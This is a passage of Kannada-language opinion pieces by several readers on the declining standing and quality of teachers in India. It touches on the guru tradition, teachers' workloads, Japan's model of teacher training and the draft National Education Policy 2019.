ಗುರು, ನೀ ಲಘುವಲ್ಲ!

ಡಾ.ಚಂದ್ರಕಲಾ ಹೆಚ್.ಆರ್

ಭಾರತದ ಸಂಸ್ಕೃತಿಗೆ ಧಕ್ಕೆಯಾದಾಗಲೆಲ್ಲಾ ಆಚಾರ್ಯರು, ಗುರುಗಳೇ ಅಲ್ಲಿ ನಿಂತಿರುವುದು. ಭಾರತ ಗುರುಪರಂಪರೆಯ ಸತ್ಯದರ್ಶನದಿಂದ ಹಿರಿಮೆ ಸಂಪಾದಿಸಿರುವುದರಿಂದಲೇ ಜಗತ್ತು ಭಾರತದೆಡೆಗೆ ಮುಖ ಮಾಡಿರುವುದು. ಇಂತಹ ಪರಂಪರೆಯನ್ನು ಶಿಕ್ಷಕರು ತರಗತಿಯಲ್ಲಿ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ತಿಳಿಸಿ ಪ್ರೇರೇಪಿಸುವುದರಿಂದ ಮಕ್ಕಳಲ್ಲಿ ಶಿಕ್ಷಕನಾಗುವ ಛಲ ಬಂದೀತು.

‘ಗುರು ನೀ ಲಘುವಲ್ಲ. ಲಘುವಾದರೆ (ವ್ಯಾಕರಣದ) ನೀ ಗುರುವೆ ಅಲ್ಲ’ ಎಂಬ ಗುರುತರ ಜವಾಬ್ದಾರಿಯಲ್ಲಿ ಶಿಕ್ಷಕನ ಪಾತ್ರವಿದೆ. ಆದರೆ ಇಂದು ಕೆಲವು ಶಿಕ್ಷಕರು ಪ್ರಕರಣಗಳಲ್ಲಿ ಸಿಲುಕಿ ಸಾರ್ವಜನಿಕರಿಂದ ಗೂಸ ತಿಂದು ಮಾಧ್ಯಮಗಳಲ್ಲಿ ರಾರಾಜಿಸಿ ಲಘುವಾಗುತ್ತಿರುವುದು ದುರಂತವೇ.

ಹಿಂದೆ ಒಬ್ಬ ಸಂಗೀತಗಾರನ ಗಾನ, ವೇಷಭೂಷಣ, ಗೈರತ್ತುಗಳನ್ನು ನೋಡಿ ಸಂಗೀತಗಾರರಾಗುತ್ತಿದ್ದರು. ಸ್ವಾಮಿ ವಿವೇಕಾನಂದರ ಪ್ರಭಾವಕ್ಕೆ ಒಳಗಾಗಿ ಲಾಹೋರಿನ ಕಾಲೇಜು ಉಪನ್ಯಾಸಕ ಪ್ರಖರ ಸನ್ಯಾಸಿಯಾದನಂತೆ. ನಾಲ್ಕಾರು ದಶಕಗಳ ಹಿಂದೆ ಟಿ.ಎಸ್.ವೆಂಕಣ್ಣಯ್ಯ, ತ.ಸು.ಶಾಮರಾಯ, ಕುವೆಂಪು, ರಾಜರತ್ನಂ, ಪ್ರೊ.ಹಿರಿಯಣ್ಣ ಇವರ ಗರಡಿಯಲ್ಲಿ ಪಳಗಿದ ವಿದ್ಯಾರ್ಥಿಗಳು ಶಿಕ್ಷಕರಾದರು. ಆಗಿನ ಶಿಕ್ಷಕರು ತಮ್ಮೆಲ್ಲಾ ಪ್ರಯತ್ನವನ್ನು ಏಕೀಕೃತಗೊಳಿಸಿ ಆದರ್ಶದ ಸಿಂಧುವಾಗಿದ್ದರು; ಅದನ್ನು ಬಿಂದುಬಿಂದುವಾಗಿ ಸವಿದ ಶಿಷ್ಯರು ಸದ್ಗುರು ಪರಂಪರೆಯ ಕೊಂಡಿಯಾದರು. ಆದರೆ ಇಂದಿನ ಶಿಕ್ಷಕರು ಬಿಲ್-ಬೆಲ್‍ಗೆ ಸೀಮಿತವಾಗಿ, ಸಿಲಬಸ್ ಮುಗಿಸಿ, ಶೇ.100 ರಷ್ಟು ಫಲಿತಾಂಶ ಕೊಟ್ಟ ಮಾತ್ರಕ್ಕೆ ಆದರ್ಶ ಶಿಕ್ಷಕನೆಂಬ ಪ್ರಶಸ್ತಿಯ ಬೆನ್ನು ಹತ್ತುತ್ತಾರೆ.

ಸಂವಾದ ಮಾಡುವ ಶಿಕ್ಷಕರಿಲ್ಲ. ಈಗೀಗ ಶಾಲೆ, ಶಿಕ್ಷಕ, ವಿದ್ಯಾರ್ಥಿ, ಸಮಾಜದ ನಡುವೆ ಭಾವನಾತ್ಮಕ ಸಂಬಂಧ ಮರೆಯಾಗಿದೆ. ವಿದ್ಯಾರ್ಥಿಯ ಮನಸ್ಸನ್ನು ಇಂದಿನ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ ಮುಟ್ಟುವುದಿಲ್ಲ. ಅವನ ಅಂತರಂಗ- ಬಹಿರಂಗವನ್ನು ಅನುಸಂಧಿಸುವ ಪ್ರಕ್ರಿಯೆ ತರಗತಿಯಲ್ಲಿಲ್ಲ. ಯಾವ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ವಿಶ್ವಾಸ, ಗೌರವಗಳಿಗಿಂತ ವ್ಯವಹಾರಮುಖಿ ಸಂಬಂಧಗಳಿರುತ್ತವೆಯೊ ಅಲ್ಲಿ ಆರ್ಥಿಕತೆಯೇ ಪ್ರಧಾನವಾಗುತ್ತದೆ. ಶಿಕ್ಷಣದ ಉದ್ದೇಶ ಆರ್ಥಿಕತೆಯನ್ನು ಬಲಗೊಳಿಸುವುದಾಗಿದ್ದರೂ ಪಠ್ಯದ ಬೋಧನೆಗಿಂತ ಜೀವನಮೌಲ್ಯಗಳು ಬೋಧಿಸಲ್ಪಡಬೇಕು.

ಇಂದಿನ ಶಿಕ್ಷಕನ ಮೇಲೆ ಬಹಳಷ್ಟು ಜವಾಬ್ದಾರಿಗಳಿವೆ. ಇವತ್ತಿನ ಶಿಕ್ಷಕ update ಆಗದಿದ್ರೆ ವಿದ್ಯಾರ್ಥಿಗಳ ಮನಸ್ಸಿನಿಂದ outdate ಆಗಿಬಿಡುತ್ತಾನೆ.


ಶಿಕ್ಷಕ ಗುರುವಾಗಬಲ್ಲಡೆ…!

‘ಉತ್ತಮ ಗುರು ಮಾತ್ರ ಉತ್ತಮ ಶಿಷ್ಯರನ್ನು ರೂಪಿಸಬಲ್ಲನು’, ಎನ್ನುವುದು ಎಷ್ಟು ಸತ್ಯವೋ ಹಾಗೆಯೇ ಉತ್ತಮ ಶಿಷ್ಯರು ಮಾತ್ರ ಉತ್ತಮ ಗುರುವನ್ನು ಗುರುತಿಸಿ ಗೌರವಿಸಬಲ್ಲರು ಎನ್ನುವುದೂ ಸಹ. ಇದರಿಂದಾಗಿಯೇ ಇಂದು `ಗುರು’ ಎಂದು ಕರೆಯಿಸಿಕೊಳ್ಳುವ ಶಿಕ್ಷಕನಾಗಲೀ ಅಥವಾ ಧರ್ಮದ ಮುದ್ರೆಯೊತ್ತಿಸಿಕೊಂಡು ಗುರುವಾದ ವ್ಯಕ್ತಿಯಾಗಲೀ, ಅವರವರ ಹೊಣೆಗಾರಿಕೆಯನ್ನು ಸತ್ಯದ ನೆಲೆಯಲ್ಲಿ ನಿಭಾಯಿಸಬೇಕಾಗುತ್ತದೆ. ಉಟ್ಟೋ-ತೊಟ್ಟೋ ಗುರುವಾದವರು, ಗಾದಿ-ಹುದ್ದೆಯನ್ನು ಹೊಂದಿ ಗುರುವಾದವರು; ಸ್ವಯಂ ಘೋಷಿತವಾಗಿಯೋ ಪರ ಘೋಷಿತವಾಗಿಯೋ ಗುರುವಾದವರು, ದೀರ್ಘಕಾಲದಲ್ಲಿ ಗುರುತ್ವದ ಆಕರ್ಷಣೆ ಹೊಂದಲಾರರು.

ಈ ದೃಷ್ಟಿಯಿಂದ ಉತ್ತಮ ಮಾನವ ಸಂಪನ್ಮೂಲವನ್ನು ಸೃಷ್ಟಿಸುವ ಹೊಣೆ ಹೊತ್ತಿರುವ, ಅನುಭವಗಳನ್ನು ಅನುಭಾವವಾಗಿಸಿ ದಾಸೋಹಗೊಳಿಸುವ ಜವಾಬ್ದಾರಿ ಹೊತ್ತ, ದರ್ಶನಗಳನ್ನು ಜ್ಞಾನವನ್ನಾಗಿಸುವ ಮತ್ತು ಜ್ಞಾನವನ್ನು ಅನಂತದೆಡೆಗೆ ಕೊಂಡೊಯ್ಯುವ ಶಕ್ತಿಯಾದ ಗುರುಗಳಾದರೂ `ಅವರಾಗಿಯೇ ಅವರು ಆಗುತ್ತಾರೆ’ ಎನ್ನುವುದರ ಬದಲಾಗಿ `ರೂಪಿಸಬೇಕು’ ಎನ್ನುವ ಹೊಣೆಗಾರಿಕೆ ಕೂಡ ನಮ್ಮ ಜನ ಸಂಘಟನೆಗಳ, ಸಂಘ ಸಂಸ್ಥೆಗಳ ಮತ್ತು, ಒಟ್ಟಾರೆಯಾಗಿ ಇಡೀ ಸಮಷ್ಠಿಯ ಹೊಣೆಗಾರಿಕೆಯಾಗಿದೆ.

ಒಮ್ಮೆ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಯೊಂದರ ಆಡಳಿತಾಧಿಕಾರಿಯಾಗಿ ಉಪನ್ಯಾಸಕರೊಬ್ಬರು ಪಾಠ ಮಾಡುವ ತರಗತಿಯೊಳಗೆ ಅಲ್ಲಿನ ಪ್ರಾಂಶುಪಾಲರೊಂದಿಗೆ ಹೋಗಿದ್ದೆ; ಕನ್ನಡ ಭಾಷಾ ಬೋಧನೆಯ ಅಧ್ಯಾಪಕ ವಿದ್ಯಾರ್ಥಿಯ ಪಠ್ಯಪುಸ್ತಕ ಹಿಡಿದು ಪಾಠ ಮಾಡುತ್ತಿದ್ದರು! ಯುಜಿಸಿ ವೇತನ ಪಡೆದು ಪಠ್ಯಪುಸ್ತಕ ಕೊಳ್ಳದೆ ತರಗತಿಯ ಒಳಗೆ ಹೋಗಿ ವಿದ್ಯಾರ್ಥಿಯೊಬ್ಬರಿಂದ ಪಠ್ಯಪುಸ್ತಕ ಪಡೆದು ಪಠ್ಯವನ್ನೊ, ಗದ್ಯವನ್ನೋ ಬೋಧಿಸಿ ಆ ಪುಸ್ತಕವನ್ನು ವಿದ್ಯಾರ್ಥಿಗೆ ಹಿಂದಿರುಗಿಸಿ ಹೊರಬರುವುದನ್ನು ಕೇಳಿ ದಂಗಾಗಿ ಹೋದೆ. ಹಾಗೆಯೇ ತಾವು ವಿದ್ಯಾರ್ಥಿಯಾಗಿದ್ದಾಗ ಅವರ ಅಧ್ಯಾಪಕರು ಬರೆಯಿಸಿದ ಹಳೇ ನೋಟ್ಸನ್ನೇ ಉದ್ಯೋಗ ಪೂರ್ತಿ ಉಪಯೋಗಿಸಿ ನಿವೃತ್ತರಾದ ಮಹಾಶಯರೂ ಇಲ್ಲದಿಲ್ಲ.

ಈ ಹುದ್ದೆಯನ್ನು ಆಕರ್ಷಕಗೊಳಿಸಲು ಮತ್ತು ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದ ಕೆನೆಪದರವನ್ನು ಮಾನವ ಸಂಪನ್ಮೂಲ ನಿರ್ಮಾಣಕ್ಕೆ ಬಳಸಿಕೊಳ್ಳುವ ಸಲುವಾಗಿಯೇ ಉನ್ನತ ಶಿಕ್ಷಣ ವಲಯದ ಪ್ರಾಧ್ಯಾಪಕರಿಗೆ ಯುಜಿಸಿ ವೇತನವನ್ನು ನೀಡಲಾಗಿದೆ. ಇದು ಇಂದು ವೇತನಕ್ಕೆ ತಕ್ಕಂತೆ ಪ್ರಮಾಣಾತ್ಮಕವಾಗಿ ಅವರ ಗುಣಮಟ್ಟವನ್ನು ಕ್ರಿಯಾತ್ಮಕ ಬೋಧನೆ ಮತ್ತು ಪ್ರೇರೇಪಿತ ಸಂಶೋಧನೆಗಳ ನೆಲೆಯಲ್ಲಿ ಉನ್ನತೀಕರಿಸಿಕೊಳ್ಳುತ್ತಿಲ್ಲ ಎನ್ನುವುದು ಶೋಚನೀಯ.

‘Wrong teaching is worst than no teaching and wrong teacher is worst than no teacher’,, ಎಂದರೆ ತಪ್ಪಿಲ್ಲ. `ಗುರು’ ಎನ್ನಿಸಿಕೊಳ್ಳುವ ಜವಾಬ್ದಾರಿ ಹೊತ್ತು ಯಾರೇ ಶಿಕ್ಷಕ ಮೊದಲು ತನ್ನ ವೈಯಕ್ತಿಕ ನೆಲೆಯಲ್ಲಿ ವಿಷಯ ಪರಿಣತನಿರಬೇಕು, ವೃತ್ತಿಬದ್ಧತೆಯಿಂದಿರಬೇಕು ಮತ್ತು ಬಹುಮುಖ್ಯವಾಗಿ ನಡೆ-ನುಡಿಯಲ್ಲಿ ವೈರುಧ್ಯಗಳನ್ನಿಟ್ಟುಕೊಂಡಿರಬಾರದು. ಇಂಥ ವೈರುಧ್ಯಗಳಿರುವ `ಗುರು’ವನ್ನು ಯಾವ ಶಿಷ್ಯನೂ ಸಾಕ್ಷಿಪ್ರಜ್ಞೆಯಿಂದ ಒಪ್ಪಿಕೊಳ್ಳಲಾರ.

ಇಂದಿನ ದುರಂತ ಎಂದರೆ, ರಾಜಕೀಯವನ್ನು ಹೇಗೆ ಮೂರ್ಖನ ಕೊನೇ ಪ್ರಯತ್ನ ಎಂದು ಕೆಲವೊಮ್ಮೆ ಕರೆಯುತ್ತೇವೆಯೋ ಹಾಗೆಯೇ ವೃತ್ತಿ ಮತ್ತು ಉದ್ಯೋಗಗಳಿಗೆ ಸಂಬಂಧಿಸಿದಂತೆಯೂ ಕೂಡ ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಕೊನೆಯ ಆಯ್ಕೆ ಎಂದೂ ಭಾವಿಸಲಾಗುತ್ತಿದೆ. ಆಯ್ಕೆಯ ಸಂದರ್ಭದಲ್ಲಿ ಇದನ್ನೊಂದು ಆಕರ್ಷಣೆ ರಹಿತವಾದ ಮತ್ತು ಆರ್ಥಿಕ ಲಾಭವಿಲ್ಲದ ಹುದ್ದೆ ಎಂದು ಭಾವಿಸುವುದೇ ಇದಕ್ಕೆ ಕಾರಣ. ಈ ಹುದ್ದೆಯನ್ನು ಆಕರ್ಷಕಗೊಳಿಸಲು ಮತ್ತು ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದ ಕೆನೆಪದರವನ್ನು ಮಾನವ ಸಂಪನ್ಮೂಲ ನಿರ್ಮಾಣಕ್ಕೆ ಬಳಸಿಕೊಳ್ಳುವ ಸಲುವಾಗಿಯೇ ಉನ್ನತ ಶಿಕ್ಷಣ ವಲಯದ ಪ್ರಾಧ್ಯಾಪಕರಿಗೆ ಯುಜಿಸಿ ವೇತನವನ್ನು ನೀಡಲಾಗಿದೆ. ಇದು ಇಂದು ವೇತನಕ್ಕೆ ತಕ್ಕಂತೆ ಪ್ರಮಾಣಾತ್ಮಕವಾಗಿ ಅವರ ಗುಣಮಟ್ಟವನ್ನು ಕ್ರಿಯಾತ್ಮಕ ಬೋಧನೆ ಮತ್ತು ಪ್ರೇರೇಪಿತ ಸಂಶೋಧನೆಗಳ ನೆಲೆಯಲ್ಲಿ ಉನ್ನತೀಕರಿಸಿಕೊಳ್ಳುತ್ತಿಲ್ಲ ಎನ್ನುವುದು ಶೋಚನೀಯ.

ಆಡಳಿತವನ್ನು ಚುರುಕುಗೊಳಿಸುವುದು ಸರ್ಕಾರದ ಮತ್ತು ಶೈಕ್ಷಣಿಕ ಆಡಳಿತದ ಕರ್ತವ್ಯ. ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿ 2019 ಕರಡು ಪ್ರತಿಯಲ್ಲಿ ಕೆಲವೊಂದು ಆಶಾದಾಯಕ ಕ್ರಮಗಳಿದ್ದು ಅವುಗಳ ಜಾರಿಯ ಬಗ್ಗೆ ಕಾದು ನೋಡಬೇಕಿದೆ.

ಆದ್ದರಿಂದ ನಮ್ಮ ಶಿಕ್ಷಕ ಸಮುದಾಯ ತಮಗಿರುವ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಅವಕಾಶವನ್ನು `ಗುರು’ವಾಗಿ ಪರಿವರ್ತಿತವಾಗುವ ವ್ಯಕ್ತಿತ್ವ ವಿಕಸನ ಸಾಧನೆಯಾಗಿ ಬಳಸಿಕೊಂಡರೆ, ಗುರು `ಬ್ರಹ್ಮ’ನಾಗಬಲ್ಲ; `ವಿಷ್ಣು’ವಾಗಬಲ್ಲ; `ಮಹೇಶ್ವರ’ ಸ್ಥಲದಲ್ಲಿ ಸ್ಥಿರಗೊಳ್ಳಬಲ್ಲ.

ಡಾ.ಜಿ.ಎನ್.ಮಲ್ಲಿಕಾರ್ಜುನಪ್ಪ, ಚಿತ್ರದುರ್ಗ.


ಜಪಾನ್ ಮಾದರಿಯಾಗಲಿ

ಡಾ.ವಿ.ಬಿ.ಆರತಿಯವರು ತಮ್ಮ ಇತ್ತೀಚಿನ ಲೇಖನವೊಂದರಲ್ಲಿ ಡಾ.ಎಸ್.ಎಲ್.ಬೈರಪ್ಪನವರ ಜಪಾನ್ ಭೇಟಿಯ ಅನುಭವವನ್ನು ಹಂಚಿಕೊಂಡಿದ್ದಾರೆ. ಎರಡನೆಯ ಮಹಾಯುದ್ಧದ ಪರಿಣಾಮವಾಗಿ ಜಪಾನ್ ಸಾಕಷ್ಟು ಸಾವು-ನೋವು, ಕಷ್ಟ-ನಷ್ಟ ಅನುಭವಿಸಿತು. ಆ ಬಳಿಕ ಜಪಾನ್ ಸರ್ಕಾರ ಮತ್ತು ಸಮಾಜದ ಹಿರಿಯ ಚಿಂತಕರು ಸೇರಿ, ‘ನಮ್ಮ ಮಕ್ಕಳು ಇತರರನ್ನು ಗೆಲ್ಲುವ ಆಳುವ ದುರುತ್ಸಾಹವನ್ನು ಬೆಳೆಸಿಕೊಳ್ಳುವ ಬದಲು ತಮ್ಮ ಅಂತರಂಗದ ಕೋಪತಾಪಾದಿಗಳನ್ನು ಗೆದ್ದು ಆತ್ಮಶಕ್ತಿಸಂಪನ್ನರಾಗಬೇಕು, ಶಾಂತಿ ಪ್ರಸನ್ನತೆಗಳನ್ನು ಸಂಪಾದಿಸಬೇಕು’ ಎಂದು ನಿರ್ಧರಿಸಿದರಂತೆ.

ಇಂತಹ ಅಸಾಧಾರಣ ಪರಿವರ್ತನೆಯನ್ನು ಮಾಡಬಲ್ಲವರು ಶಿಕ್ಷಕರೇ ಎಂಬುದನ್ನು ಮನಗಂಡು, ಶಾಲಾ ಶಿಕ್ಷಕರಿಗೆ ವಿಶೇಷ ಗಮನವಿತ್ತು ತರಬೇತಿ ನೀಡಲಾಯಿತಂತೆ. ಉತ್ತಮ ವೇತನ, ತರಬೇತಿ, ಹಾಗು ನಿಯಮಾವಳಿಗಳಿಂದ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಕರನ್ನು ಬೆಳೆಸಲಾಯಿತಂತೆ. ಹೀಗೆ ಗಾತ್ರದಲ್ಲಿ ಕಿರಿದಾದ ಜಪಾನ್ ದೇಶ ದೊಡ್ಡ ಸಾಧನೆಗಳನ್ನು ಮಾಡುತ್ತಾ ಶಾಂತಿ ಸಮೃದ್ಧಿ ಕೌಶಲಗಳನ್ನು ಸಂಪಾದಿಸಲು ಕಾರಣವಾಗಿದ್ದು ಅಲ್ಲಿನ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ ಹಾಗು ಪ್ರಾಮಾಣಿಕ ಶಿಕ್ಷಕರು.

ಉತ್ತಮ ಶಿಕ್ಷಕರನ್ನು ರೂಪಿಸುವ ಹೊಣೆ ಸರ್ಕಾರದ್ದಾಗಿದೆ. ಹಾಗಿದ್ದರೂ ಸರ್ಕಾರವು ಶಿಕ್ಷಣ ಇಲಾಖೆಯನ್ನು ಕಡೆಗಣಿಸಿರುವುದು ಸರಿಯಲ್ಲ. ಕರಡು ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿಯಲ್ಲಿ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಕರನ್ನು ರೂಪಿಸುವ ಅಗತ್ಯವನ್ನು ಪ್ರಸ್ತಾಪಿಸಿರುವುದು ಸಮಾಧಾನಕರ ಸಂಗತಿಯಾಗಿದೆ.

ಶಿಕ್ಷಕರ ಮೇಲೆ ಹೆಚ್ಚುತ್ತಿರುವ ಪಠ್ಯೇತರ ಚಟುವಟಿಕೆಗಳ ಹೊರೆ ಅಧ್ಯಾಪನದ ಕಳಪೆ ಗುಣಮಟ್ಟಕ್ಕೆ ಒಂದು ಕಾರಣ ಎನ್ನಲಾಗುತ್ತದೆ. ಮತದಾರರ ಪಟ್ಟಿ ತಯಾರಿಕೆ, ಶಿಕ್ಷಕರ ತರಬೇತಿಗಳು, ವಹಿಗಳ ನಿರ್ವಹಣೆ, ಸಿಆರ್‍ಪಿಗೆ ಮಾಹಿತಿ, ಆಧಾರ್ ಜೋಡಣೆ, ಸಮವಸ್ತ್ರ ಖರೀದಿ, ಬಿಸಿಯೂಟ ಕ್ಷೀರಭಾಗ್ಯ, ಮಕ್ಕಳ ದಾಖಲಾತಿ ಅಭಿಯಾನ, ಜನನ ಮರಣ ಮಾಹಿತಿ, ಶಾಲಾ ಕಾಮಗಾರಿ, ಬಿಇಒ ಕಛೇರಿಯ ಸೂಚನೆಗಳು, ಪಲ್ಸ್ ಪೋಲಿಯೊ, ಸಾಕ್ಷರತಾ ತರಬೇತಿ, ಶಾಲಾ ಉತ್ಸವಗಳು, ಹೀಗೆ ಹತ್ತು ಹಲವು ಪಠ್ಯೇತರ ಕಾಯಕಗಳನ್ನು ಶಿಕ್ಷಕರು ನಿರ್ವಹಿಸಬೇಕಾಗಿದೆ. ಸಾಲದೆಂಬತೆ ಸರ್ಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿ ಶಿಕ್ಷಕರ, ಮೂಲ ಸೌಕರ್ಯಗಳ, ಪಠ್ಯಪುಸ್ತಕಗಳ ಕೊರತೆಯೂ ಇದೆ. ಈ ಸವಾಲುಗಳೊಡನೆ ಸ್ಥಳೀಯ ಒತ್ತಡಗಳು ಹಾಗು ಸರ್ಕಾರದ ನೀತಿಗಳು ಜೊತೆಯಾಗಿವೆ. ಇಂತಹ ಪರಿಸ್ಥಿತಿಯಲ್ಲಿ ಶಿಕ್ಷಕರು ತಮ್ಮ ಪ್ರತಿಭೆಯನ್ನು ವಿದ್ಯಾರ್ಥಿಗಳ ಶ್ರೇಯೋಭಿವೃದ್ಧಿಗೆ ಬಳಸಿಕೊಳ್ಳಲು ಅಡ್ಡಿಯಾಗುತ್ತಿವೆ ಎಂಬ ಕೂಗು ಸಹ ಕೇಳಿ ಬರುತ್ತಿದೆ.

ಹಿಂದೆ ಪ್ರಚಲಿತವಿದ್ದ ಗುರುಕುಲ ಪದ್ಧತಿಯ ಶಿಕ್ಷಣ ಹಾಗು ಶಿಕ್ಷಕರನ್ನು ಇಂದಿನ ಕಾಲಘಟ್ಟದಲ್ಲಿ ನಿರೀಕ್ಷಿಸುವುದರಿಂದ ಸಮಸ್ಯೆಗೆ ಪರಿಹಾರ ದೊರಕುವುದಿಲ್ಲ. ಬದಲಿಗೆ ಸಮಗ್ರ ಶಿಕ್ಷಣ ನೀತಿಯನ್ನು ಅನುಷ್ಠಾನಕ್ಕೆ ತಂದು ಉತ್ತಮ ಶಿಕ್ಷಕರನ್ನು ರೂಪಿಸಬೇಕು. ಆ ಮೂಲಕ ದೇಶದ ಭವಿಷ್ಯವನ್ನು ಉಜ್ವಲಗೊಳಿಸಲು ಸರ್ಕಾರ ಕಾರ್ಯಪ್ರವೃತ್ತವಾಗಬೇಕು.

ಮಂಜುನಾಥ. ಡಿ.ಎಸ್., ಬೆಂಗಳೂರು.


ಕಳಪೆ ಶಿಕ್ಷಣವೇ ಅನಾಚಾರಗಳಿಗೆ ಕಾರಣ

ತನ್ನ ಅಭಿವ್ಯಕ್ತಿ ಹಾಗೂ ಸಾಮಥ್ರ್ಯಕ್ಕೆ ಅನುಗುಣವಾಗಿ ಸಮಾಜದ ವಿವಿಧ ಸ್ತರಗಳೊಂದಿಗೆ ಪರಸ್ಪರ ಸಂಘರ್ಷಿಸಿ ಉತ್ತಮವಾದ ಕೊಡುಗೆಯನ್ನು ನೀಡುವಂತೆ ಒಬ್ಬ ವ್ಯಕ್ತಿಯನ್ನು ಅಣಿಗೊಳಿಸುವ ಸಾಧನವೇ ಶಿಕ್ಷಣ.

ಈ ದೆಸೆಯಲ್ಲಿ ವಿಚಾರ ಮಾಡಿದಾಗ ಶಿಕ್ಷಕರು ಎಷ್ಟರಮಟ್ಟಿಗೆ ವ್ಯಕ್ತಿಗಳನ್ನು ಈ ನಿಟ್ಟಿನಲ್ಲಿ ಅಣಿಗೊಳಿಸುತ್ತಿದ್ದಾರೆಂಬ ಪ್ರಶ್ನೆ ಉದ್ಭವಿಸುತ್ತದೆ. ಶೇಕಡಾ 4 ಅಥವಾ 5 ರಷ್ಟು ಮಾತ್ರ ಈ ಕಾರ್ಯ ನಡೆದಿದೆ. ಆದ್ದರಿಂದಲೇ ಸಮಾಜದಲ್ಲಿ ಅಶಾಂತಿ, ಅತ್ಯಾಚಾರ, ದರೋಡೆ ಹಾಗೂ ಭ್ರಷ್ಟಾಚಾರಗಳು ಇತ್ಯಾದಿ ತುಂಬಿತುಳುಕುತ್ತಲೇ ಇವೆ. ಇದಕ್ಕೆ ಮೂಲ ಕಾರಣ `ಕಳಪೆ ಶಿಕ್ಷಣ-ಕೆಟ್ಟ ಶಿಕ್ಷಕ’.

ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರಕ್ಕೆ ಬರುವ ಶಿಕ್ಷಕರಲ್ಲಿ ಅನೇಕರು ಸರಿಯಾದ ಶಿಕ್ಷಣ, ವೃತ್ತಿ ತರಬೇತಿ ಪಡೆದಿರುವುದಿಲ್ಲ. ನಾನು ವೀಕ್ಷಣೆ ಮಾಡಿದ ಪ್ರಕಾರ ಕೆಲ ಶಿಕ್ಷಕರಿಗೆ ಸರಿಯಾಗಿ ಬರೆಯಲು ಲಿಪಿ ಒತ್ತಕ್ಷರಗಳ ಬಗ್ಗೆ ಮಾಹಿತಿಯಿಲ್ಲ. ಮೊದಲ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದವರು ಶಿಕ್ಷಕವೃತ್ತಿ ಕಡೆಗೆ ಆಕರ್ಷಿಸುತ್ತಿಲ್ಲವೇಕೆಂದರೆ, ಬೇರೆ ಕ್ಷೇತ್ರಗಳತ್ತ ತಂದೆ-ತಾಯಿಗಳ ಒತ್ತಾಯ. ಅಲ್ಲಿನ ಹೆಚ್ಚಿನ ಸಂಬಳ-ಸವಲತ್ತುಗಳು ಅವರನ್ನು ಆಕರ್ಷಿಸುತ್ತಿವೆ. ಈ ದೃಷ್ಟಿಯಿಂದ ವಿಚಾರಿಸಿದಾಗ ಸಂಬಳವೂ ಆಕರ್ಷಿತವಾಗಿರಬೇಕು. ಜೊತೆಗೆ ದರ್ಜೆಯ ಉತ್ತೀರ್ಣತೆಯ ಆಧಾರಗಳ ಮೇಲೆ ಸಂಬಳದ ಸ್ಕೇಲ್‍ಗಳನ್ನು ನಿರ್ಧರಿಸುವುದು ಉತ್ತಮವೆಂದು ನನ್ನ ಅನಿಸಿಕೆ.

ನಮ್ಮ ಸಮಾಜವು ಶಿಕ್ಷಕರಿಗೆ ಗೌರವ ಕೊಡದಿರುವುದಕ್ಕೆ ಮುಖ್ಯ ಕಾರಣ ಶೇಕಡಾ 80-90 ಶಿಕ್ಷಕರು ಮೊದಲಿನವರಷ್ಟು ಪರಿಣತರಲ್ಲ; ಹೆಚ್ಚು ಪಠ್ಯ ಪುಸ್ತಕ ಆಧಾರಿತವಾಗಿದ್ದಾರೆ, ಹೆಚ್ಚಿನ ಜ್ಞಾನವನ್ನು ಮಕ್ಕಳಿಗೆ ಕೊಡುತ್ತಿಲ್ಲ, ಅವರಿಗೆ ಓದುವ ಹವ್ಯಾಸ ಕಡಿಮೆ, ಪೂರ್ವ ತಯಾರಿಯಿಲ್ಲ.

ಸರ್ಕಾರ ಸಹ ಉತ್ತಮ ಶಿಕ್ಷಕರನ್ನು ಗುರುತಿಸಿ ಸನ್ಮಾನಿಸಬೇಕಾಗಿದೆ. ಅದರಲ್ಲಿ ರಾಜಕೀಯ ಅಡ್ಡ ಬರಬಾರದು. ಕೆಲದಿನ `ಜನಪ್ರಿಯ ಶಿಕ್ಷಕ-ಶಿಕ್ಷಕಿ’ ಪ್ರಶಸ್ತಿಗಳನ್ನು ಕೊಡಲಾಗುತ್ತಿತ್ತು. ನಂತರ ನಿಲ್ಲಿಸಲಾಯಿತು. `ರಾಷ್ಟ್ರೀಯ ವಿಕೋಪ’ ಉಂಟಾಗದಂತೆ ನಾವೆಲ್ಲರೂ ಪ್ರಯತ್ನಿಸಬಹುದು.

-ಬಿ.ಬಿ.ನಾಗನೂರ, ನಿಪ್ಪಾಣಿ.


‘ಸತ್ತಂತಿಹರನು ಬಡಿದೆಚ್ಚರಿಸು’

ಶಿಕ್ಷಕರನ್ನು ಗುರುತಿಸದ ದೇಶಕ್ಕೆ ತಿಳಿವಳಿಕೆ ನೀಡುವುದು ಎಂದರೆ ಆ ಕುರಿತು ದೇಶಕ್ಕೆ ಶಿಕ್ಷಣ ನೀಡುವುದು ಎಂದೇ ಅರ್ಥ. ತಿಳಿವಳಿಕೆ ಮತ್ತು ಶಿಕ್ಷಣದ ನಡುವೆ ಅವಿನಾಭಾವ ಸಂಬಂಧವಿದೆ. ಇತರ ಎಲ್ಲಾ ಕ್ಷೇತ್ರಗಳ ಬಗ್ಗೆ ತಿಳಿವಳಿಕೆ ನೀಡುವ ಶಿಕ್ಷಣಕ್ಷೇತ್ರದ ಕುರಿತೇ ತಿಳಿವಳಿಕೆ ನೀಡಬೇಕಾಗಿ ಬಂದಿರುವುದು ನಮ್ಮ ವ್ಯವಸ್ಥೆಯ ಅವ್ಯವಸ್ಥೆಗೆ ಹಿಡಿದ ಕನ್ನಡಿ. ಈ ಸಮಸ್ಯೆಗೆ ಶಿಕ್ಷಕ ಎನ್ನುವ 